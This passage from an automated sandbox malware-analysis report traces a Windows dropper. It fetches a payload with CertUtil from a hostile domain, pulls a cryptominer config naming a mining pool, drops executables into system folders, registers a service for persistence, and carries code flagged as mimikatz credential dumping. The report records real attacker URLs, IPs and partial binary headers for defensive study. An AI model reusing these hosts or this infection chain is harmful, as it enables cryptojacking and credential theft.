00 42 47 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 10 60 00 00 04 00 00 00 46 47 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$:3~]~]~]Q{]Vw]Wx]SR](NR]|]~\]Nc]HW]HV]V]We]~]*][]Rich~]PEL\PG_`@ ``|UPX0UPX1PGBG@UPX2`FG@
Session ID Source IP Source Port Destination IP Destination Port Process
1 192.168.2.5 49801 45.67.14.164 80 C:\Users\user\Desktop\download.exe
Timestamp kBytes transferred Direction Data
May 16, 2019 17:15:44.320504904 CEST
4880 OUT GET /sqlisrv.exe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: */*User-Agent: Microsoft-CryptoAPI/10.0Host: fid.hognoob.se
May 16, 2019 17:15:44.368107080 CEST
4881 IN HTTP/1.1 200 OKServer: nginxDate: Thu, 16 May 2019 15:15:44 GMTContent-Type: application/octet-streamContent-Length: 4672000Last-Modified: Tue, 14 May 2019 19:53:23 GMTConnection: keep-aliveETag: "5cdb1cb3-474a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3a b7 33 ae 7e d6 5d fd 7e d6 5d fd 7e d6 5d fd 05 ca 51 fd 7b d6 5d fd 11 c9 56 fd 77 d6 5d fd 11 c9 57 fd 78 d6 5d fd fd ca 53 fd 52 d6 5d fd 28 c9 4e fd 52 d6 5d fd fd de 00 fd 7c d6 5d fd 7e d6 5c fd d1 d4 5d fd 1c c9 4e fd 63 d6 5d fd 48 f0 57 fd b3 d6 5d fd 48 f0 56 fd 1e d6 5d fd 96 c9 56 fd 1a d6 5d fd 96 c9 57 fd 65 d6 5d fd 7e d6 5d fd 2a d6 5d fd b9 d0 5b fd 7f d6 5d fd 52 69 63 68 7e d6 5d fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 81 13 db 5c 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 50 47 00 00 10 00 00 00 b0 18 00 f0 ff 5f 00 00 c0 18 00 00 10 60 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 60 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 10 60 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 b0 18 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 50 47 00 00 c0 18 
00 00 42 47 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 10 60 00 00 04 00 00 00 46 47 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$:3~]~]~]Q{]Vw]Wx]SR](NR]|]~\]Nc]HW]HV]V]We]~]*][]Rich~]PEL\PG_`@ ``|UPX0UPX1PGBG@UPX2`FG@
Session ID Source IP Source Port Destination IP Destination Port Process
2 192.168.2.5 49804 45.67.14.164 80 C:\Users\user\Desktop\download.exe
Timestamp kBytes transferred Direction Data
May 16, 2019 17:15:47.054552078 CEST
9701 OUT GET /sqlisrv.exe HTTP/1.1Accept: */*User-Agent: CertUtil URL AgentHost: fid.hognoob.seCache-Control: no-cache
May 16, 2019 17:15:47.101970911 CEST
9702 IN HTTP/1.1 200 OKServer: nginxDate: Thu, 16 May 2019 15:15:47 GMTContent-Type: application/octet-streamContent-Length: 4672000Last-Modified: Tue, 14 May 2019 19:53:23 GMTConnection: keep-aliveETag: "5cdb1cb3-474a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3a b7 33 ae 7e d6 5d fd 7e d6 5d fd 7e d6 5d fd 05 ca 51 fd 7b d6 5d fd 11 c9 56 fd 77 d6 5d fd 11 c9 57 fd 78 d6 5d fd fd ca 53 fd 52 d6 5d fd 28 c9 4e fd 52 d6 5d fd fd de 00 fd 7c d6 5d fd 7e d6 5c fd d1 d4 5d fd 1c c9 4e fd 63 d6 5d fd 48 f0 57 fd b3 d6 5d fd 48 f0 56 fd 1e d6 5d fd 96 c9 56 fd 1a d6 5d fd 96 c9 57 fd 65 d6 5d fd 7e d6 5d fd 2a d6 5d fd b9 d0 5b fd 7f d6 5d fd 52 69 63 68 7e d6 5d fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 81 13 db 5c 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 50 47 00 00 10 00 00 00 b0 18 00 f0 ff 5f 00 00 c0 18 00 00 10 60 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 60 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 10 60 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 b0 18 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 50 47 00 00 c0 18 
00 00 42 47 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 10 60 00 00 04 00 00 00 46 47 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$:3~]~]~]Q{]Vw]Wx]SR](NR]|]~\]Nc]HW]HV]V]We]~]*][]Rich~]PEL\PG_`@ ``|UPX0UPX1PGBG@UPX2`FG@
Session ID Source IP Source Port Destination IP Destination Port Process
3 192.168.2.5 49808 195.128.126.120 63145 C:\Windows\cc3d3243\b158ac7.exe
Timestamp kBytes transferred Direction Data
May 16, 2019 17:15:53.229324102 CEST
14580 OUT GET /cfg.ini HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: uio.hognoob.se:63145Cache-Control: no-cache
May 16, 2019 17:15:53.290889025 CEST
14581 IN HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Tue, 14 May 2019 20:09:55 GMTAccept-Ranges: bytesETag: "867ebbff90ad51:0"Server: Microsoft-IIS/7.5Date: Thu, 16 May 2019 15:15:55 GMTContent-Length: 299Data Raw: 5b 55 70 64 61 74 65 4e 6f 64 65 5d 0d 0a 4e 6f 64 65 31 3d 75 70 61 31 2e 68 6f 67 6e 6f 6f 62 2e 73 65 0d 0a 4e 6f 64 65 32 3d 75 70 61 32 2e 68 6f 67 6e 6f 6f 62 2e 73 65 0d 0a 5b 4d 61 69 6e 55 70 64 61 74 65 5d 0d 0a 4d 61 69 6e 56 65 72 73 69 6f 6e 3d 32 30 31 39 30 35 31 35 0d 0a 4d 61 69 6e 45 78 65 4e 61 6d 65 3d 65 76 65 6e 73 76 63 0d 0a 4d 61 69 6e 53 69 7a 65 3d 34 36 37 32 30 30 30 0d 0a 5b 44 6f 77 6e 6c 6f 61 64 5d 0d 0a 55 72 6c 3d 68 74 74 70 3a 2f 2f 66 69 64 2e 68 6f 67 6e 6f 6f 62 2e 73 65 2f 64 6f 77 6e 6c 6f 61 64 2e 65 78 65 0d 0a 5b 4d 69 6e 49 6e 67 5d 0d 0a 4d 69 6e 65 55 70 64 61 74 65 3d 6f 66 66 0d 0a 4d 69 6e 69 6e 67 50 6f 6f 6c 3d 70 78 78 2e 68 6f 67 6e 6f 6f 62 2e 73 65 3a 33 35 37 38 39 0d 0a 4d 69 6e 69 6e 67 50 6f 6f 6c 42 61 63 6b 55 70 3d 70 78 78 2e 68 6f 67 6e 6f 6f 62 2e 73 65 3a 33 35 37 38 39 0d 0a 43 50 55 4f 63 63 75 50 61 6e 63 79 3d 31 Data Ascii: [UpdateNode]Node1=upa1.hognoob.seNode2=upa2.hognoob.se[MainUpdate]MainVersion=20190515MainExeName=evensvcMainSize=4672000[Download]Url=http://fid.hognoob.se/download.exe[MinIng]MineUpdate=offMiningPool=pxx.hognoob.se:35789MiningPoolBackUp=pxx.hognoob.se:35789CPUOccuPancy=1
May 16, 2019 17:15:53.295945883 CEST
14581 OUT GET /cfg.ini HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: uio.hognoob.se:63145Cache-Control: no-cache
May 16, 2019 17:15:53.355729103 CEST
14582 IN HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Tue, 14 May 2019 20:09:55 GMTAccept-Ranges: bytesETag: "867ebbff90ad51:0"Server: Microsoft-IIS/7.5Date: Thu, 16 May 2019 15:15:55 GMTContent-Length: 299Data Raw: 5b 55 70 64 61 74 65 4e 6f 64 65 5d 0d 0a 4e 6f 64 65 31 3d 75 70 61 31 2e 68 6f 67 6e 6f 6f 62 2e 73 65 0d 0a 4e 6f 64 65 32 3d 75 70 61 32 2e 68 6f 67 6e 6f 6f 62 2e 73 65 0d 0a 5b 4d 61 69 6e 55 70 64 61 74 65 5d 0d 0a 4d 61 69 6e 56 65 72 73 69 6f 6e 3d 32 30 31 39 30 35 31 35 0d 0a 4d 61 69 6e 45 78 65 4e 61 6d 65 3d 65 76 65 6e 73 76 63 0d 0a 4d 61 69 6e 53 69 7a 65 3d 34 36 37 32 30 30 30 0d 0a 5b 44 6f 77 6e 6c 6f 61 64 5d 0d 0a 55 72 6c 3d 68 74 74 70 3a 2f 2f 66 69 64 2e 68 6f 67 6e 6f 6f 62 2e 73 65 2f 64 6f 77 6e 6c 6f 61 64 2e 65 78 65 0d 0a 5b 4d 69 6e 49 6e 67 5d 0d 0a 4d 69 6e 65 55 70 64 61 74 65 3d 6f 66 66 0d 0a 4d 69 6e 69 6e 67 50 6f 6f 6c 3d 70 78 78 2e 68 6f 67 6e 6f 6f 62 2e 73 65 3a 33 35 37 38 39 0d 0a 4d 69 6e 69 6e 67 50 6f 6f 6c 42 61 63 6b 55 70 3d 70 78 78 2e 68 6f 67 6e 6f 6f 62 2e 73 65 3a 33 35 37 38 39 0d 0a 43 50 55 4f 63 63 75 50 61 6e 63 79 3d 31 Data Ascii: [UpdateNode]Node1=upa1.hognoob.seNode2=upa2.hognoob.se[MainUpdate]MainVersion=20190515MainExeName=evensvcMainSize=4672000[Download]Url=http://fid.hognoob.se/download.exe[MinIng]MineUpdate=offMiningPool=pxx.hognoob.se:35789MiningPoolBackUp=pxx.hognoob.se:35789CPUOccuPancy=1
Code Manipulations
Statistics
Behavior
• download.exe
• qwr4rt.exe
• ycemck.exe
• sqlisrv.exe
• cmd.exe
• cmd.exe
• conhost.exe
• conhost.exe
• PING.EXE
• certutil.exe
• b158ac7.exe
• b158ac7.exe
• cmd.exe
• conhost.exe
• cmd.exe
• cacls.exe
• netsh.exe
• conhost.exe
• netsh.exe
• conhost.exe
• cmd.exe
• cacls.exe
• cmd.exe
• cacls.exe
• sqlisrv.exe
• cmd.exe
• conhost.exe
• GogoleUpadte.exe
• cmd.exe
• cmd.exe
• conhost.exe
• conhost.exe
• vfshost.exe
• ouousbpro.exe
• cmd.exe
• cmd.exe
• conhost.exe
System Behavior
Analysis Process: download.exe PID: 3076 Parent PID: 3220
General
Start time: 17:15:36
Start date: 16/05/2019
Path: C:\Users\user\Desktop\download.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\download.exe'
Imagebase: 0x400000
File size: 322560 bytes
MD5 hash: 31E46700743FAA4304532B36311E1177
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches: Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000002.5123455439.0000000000767000.00000004.sdmp, Author: Florian Roth; Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000002.5112633665.0000000000540000.00000004.sdmp, Author: Florian Roth; Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000002.5104166883.0000000000401000.00000040.sdmp, Author: Florian Roth
Reputation: low
File Activities
File Created
File Path Access Attributes Options Completion Count Source Address Symbol
C:\WebKitSdk\ read data or list directory | synchronize
normal directory file | synchronous io non alert | open for backup ident | open reparse point
success or wait 1 401CAF CreateDirectoryA
C:\WebKitSdk\2.25.14\ read data or list directory | synchronize
normal directory file | synchronous io non alert | open for backup ident | open reparse point
success or wait 1 401CAF CreateDirectoryA
C:\WebKitSdk\2.25.14\qwr4rt.exe read attributes | synchronize | generic write
normal synchronous io non alert | non directory file
success or wait 1 470034 CreateFileA
C:\WebKitSdk\2.25.14\sqlisrv.exe read attributes | synchronize | generic write
normal synchronous io non alert | non directory file
success or wait 1 470034 CreateFileA
C:\Users\user\AppData\Local\Temp\509703 read data or list directory | synchronize
normal directory file | synchronous io non alert | open for backup ident | open reparse point
success or wait 1 4016C1 CreateDirectoryA
C:\Users\user\AppData\Local\Temp\509703\....\ read data or list directory | synchronize
normal directory file | synchronous io non alert | open for backup ident | open reparse point
success or wait 1 4016FE CreateDirectoryA
C:\Users\user\AppData\Local\Temp\509718 read data or list directory | synchronize
normal directory file | synchronous io non alert | open for backup ident | open reparse point
success or wait 1 4016C1 CreateDirectoryA
C:\Users\user\AppData\Local\Temp\509718\....\ read data or list directory | synchronize
normal directory file | synchronous io non alert | open for backup ident | open reparse point
success or wait 1 4016FE CreateDirectoryA
File Deleted
File Path Completion Count Source Address Symbol
C:\Users\user\AppData\Local\Temp\509718\TemporaryFile\TemporaryFile cannot delete 1 417156 DeleteFileA
File Moved
Old File Path New File Path Completion Count Source Address Symbol
C:\Users\user\AppData\Local\Temp\509703\.... C:\Users\user\AppData\Local\Temp\509703\TemporaryFile success or wait 1 4017B2 MoveFileA
C:\Users\user\Desktop\download.exe C:\Users\user\AppData\Local\Temp\509718\....\TemporaryFile success or wait 1 40174D MoveFileA
C:\Users\user\AppData\Local\Temp\509718\.... C:\Users\user\AppData\Local\Temp\509718\TemporaryFile success or wait 1 4017B2 MoveFileA
File Written
File Path Offset Length Value Ascii Completion Count Source Address Symbol
C:\WebKitSdk\2.25.14\qwr4rt.exe unknown 73728 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 21 6d de 5c 65 0c b0 0f 65 0c b0 0f 65 0c b0 0f 1e 10 bc 0f 64 0c b0 0f a6 03 ed 0f 63 0c b0 0f e6 10 be 0f 64 0c b0 0f 0a 13 bb 0f 64 0c b0 0f 0a 13 ba 0f 6e 0c b0 0f 0a 13 b4 0f 67 0c b0 0f 53 2a bb 0f 66 0c b0 0f 53 2a b4 0f 66 0c b0 0f 65 0c b1 0f 6e 0d b0 0f 8d 13 bb 0f 6c 0c b0 0f a2 0a b6 0f 64 0c b0 0f 52 69 63 68 65 0c b0 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!m.\e...e...e.......d.......c.......d.......d.......n.......g...S*..f...S*..f...e...n.......l.......d...Riche..................
success or wait 1 4700CB WriteFile
C:\WebKitSdk\2.25.14\sqlisrv.exe unknown 4672000 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3a b7 33 ae 7e d6 5d fd 7e d6 5d fd 7e d6 5d fd 05 ca 51 fd 7b d6 5d fd 11 c9 56 fd 77 d6 5d fd 11 c9 57 fd 78 d6 5d fd fd ca 53 fd 52 d6 5d fd 28 c9 4e fd 52 d6 5d fd fd de 00 fd 7c d6 5d fd 7e d6 5c fd d1 d4 5d fd 1c c9 4e fd 63 d6 5d fd 48 f0 57 fd b3 d6 5d fd 48 f0 56 fd 1e d6 5d fd 96 c9 56 fd 1a d6 5d fd 96 c9 57 fd 65 d6 5d fd 7e d6 5d fd 2a d6 5d fd b9 d0 5b fd 7f d6 5d
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.3.~.].~.].~.]...Q.{.]...V.w.]...W.x.]...S.R.].(.N.R.].....|.].~.\...]...N.c.].H.W...].H.V...]...V...]...W.e.].~.].*.]...[...]
success or wait 1 4700CB WriteFile
File Path Offset Length Completion Count Source Address Symbol
Analysis Process: qwr4rt.exe PID: 3308 Parent PID: 3076
General
Start time: 17:15:36
Start date: 16/05/2019
Path: C:\WebKitSdk\2.25.14\qwr4rt.exe
Wow64 process (32bit): true
Commandline: C:\WebKitSdk\2.25.14\qwr4rt.exe
Imagebase: 0x400000
File size: 73728 bytes
MD5 hash: EABDC54C61088B769E9AF917AA6B05A4
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches: Detection: 100%, Avira; Detection: 79%, virustotal
Reputation: low
File Activities
File Created
File Path Access Attributes Options Completion Count Source Address Symbol
C:\Windows\SysWOW64\ycemck.exe read data or list directory | read attributes | delete | write dac | synchronize | generic read | generic write
archive sequential only | non directory file
success or wait 1 100033DA CopyFileA
File Moved
Old File Path New File Path Completion Count Source Address Symbol
C:\WebKitSdk\2.25.14\qwr4rt.exe C:\Windows\SysWOW64\506281.bak success or wait 1 10002093 MoveFileA
File Written
File Path Offset Length Value Ascii Completion Count Source Address Symbol
C:\Windows\SysWOW64\ycemck.exe 0 73728 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 21 6d de 5c 65 0c b0 0f 65 0c b0 0f 65 0c b0 0f 1e 10 bc 0f 64 0c b0 0f a6 03 ed 0f 63 0c b0 0f e6 10 be 0f 64 0c b0 0f 0a 13 bb 0f 64 0c b0 0f 0a 13 ba 0f 6e 0c b0 0f 0a 13 b4 0f 67 0c b0 0f 53 2a bb 0f 66 0c b0 0f 53 2a b4 0f 66 0c b0 0f 65 0c b1 0f 6e 0d b0 0f 8d 13 bb 0f 6c 0c b0 0f a2 0a b6 0f 64 0c b0 0f 52 69 63 68 65 0c b0 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!m.\e...e...e.......d.......c.......d.......d.......n.......g...S*..f...S*..f...e...n.......l.......d...Riche..................
success or wait 1 100033DA CopyFileA
File Path Offset Length Completion CountSourceAddress Symbol
File CreatedFile Created
File MovedFile Moved
File WrittenFile Written
Copyright Joe Security LLC 2019 Page 53 of 69
Key Path Name Type Data Completion CountSourceAddress Symbol
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\nprrstu
Group unicode Default success or wait 1 10004A8C RegSetValueExA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\nprrstu
InstallTime unicode 2019-05-16 17:15 success or wait 1 10004A8C RegSetValueExA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager
PendingFileRenameOperations
unicode array \??\C:\Windows\SysWOW64\506281.bak
success or wait 1 100020A4 MoveFileExA
Key Path Name Type Old Data New Data Completion CountSourceAddress Symbol
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\nprrstu
Description unicode nprrstu nprrstu Yabcdefgh Jklmnop Rstuvwxy Bcd
success or wait 1 100035CA RegSetValueExA
File ActivitiesFile Activities
Start time: 17:15:37
Start date: 16/05/2019
Path: C:\Windows\SysWOW64\ycemck.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\ycemck.exe
Imagebase: 0x400000
File size: 73728 bytes
MD5 hash: EABDC54C61088B769E9AF917AA6B05A4
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches: Detection: 100%, AviraDetection: 79%, virustotal, Browse
Reputation: low
File Path Offset Length Completion CountSourceAddress Symbol
Start time: 17:15:40
Start date: 16/05/2019
Path: C:\WebKitSdk\2.25.14\sqlisrv.exe
Wow64 process (32bit): true
Commandline: C:\WebKitSdk\2.25.14\sqlisrv.exe
Imagebase: 0x400000
File size: 4672000 bytes
MD5 hash: 1328C9CC50BD324399B4A83CA043BE6E
Has administrator privileges: true
Programmed in: C, C++ or other language
Key Value CreatedKey Value Created
Key Value ModifiedKey Value Modified
Analysis Process: ycemck.exe PID: 3268 Parent PID: 564Analysis Process: ycemck.exe PID: 3268 Parent PID: 564
General
Analysis Process: sqlisrv.exe PID: 4748 Parent PID: 3076Analysis Process: sqlisrv.exe PID: 4748 Parent PID: 3076
General
Copyright Joe Security LLC 2019 Page 54 of 69
File ActivitiesFile Activities
Yara matches: Rule: mimikatz, Description: mimikatz, Source: 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, Author: Benjamin DELPY (gentilkiwi)Rule: hacktool_windows_mimikatz_errors, Description: Mimikatz credential dump tool: Error messages, Source: 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, Author: @fusionraceRule: hacktool_windows_mimikatz_sekurlsa, Description: Mimikatz credential dump tool, Source: 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, Author: @fusionraceRule: mimikatz, Description: mimikatz, Source: 00000004.00000002.5101425693.0000000000401000.00000040.sdmp, Author: Benjamin DELPY (gentilkiwi)Rule: hacktool_windows_mimikatz_errors, Description: Mimikatz credential dump tool: Error messages, Source: 00000004.00000002.5101425693.0000000000401000.00000040.sdmp, Author: @fusionraceRule: hacktool_windows_mimikatz_sekurlsa, Description: Mimikatz credential dump tool, Source: 00000004.00000002.5101425693.0000000000401000.00000040.sdmp, Author: @fusionrace
Antivirus matches: Detection: 100%, AviraDetection: 100%, Joe Sandbox MLDetection: 74%, virustotal, Browse
Reputation: low
File Path Access Attributes Options Completion CountSourceAddress Symbol
C:\Windows\cc3d3243\ read data or list directory | synchronize
normal directory file | synchronous io non alert | open for backup ident | open reparse point
success or wait 1 42A03F CreateDirectoryA
C:\Windows\cc3d3243\b158ac7.exe read data or list directory | read attributes | delete | write dac | synchronize | generic read | generic write
archive sequential only | non directory file
success or wait 1 42A083 CopyFileA
C:\Users\user\AppData\Local\Temp\509484 read data or list directory | synchronize
normal directory file | synchronous io non alert | open for backup ident | open reparse point
success or wait 1 404859 CreateDirectoryA
C:\Users\user\AppData\Local\Temp\509484\....\ read data or list directory | synchronize
normal directory file | synchronous io non alert | open for backup ident | open reparse point
success or wait 1 404896 CreateDirectoryA
File Path Completion CountSourceAddress Symbol
C:\Users\user\AppData\Local\Temp\509484\TemporaryFile\TemporaryFile cannot delete 1 442366 DeleteFileA
Old File Path New File Path Completion CountSourceAddress Symbol
C:\WebKitSdk\2.25.14\sqlisrv.exe C:\Users\user\AppData\Local\Temp\509484\....\TemporaryFile success or wait 1 4048E5 MoveFileA
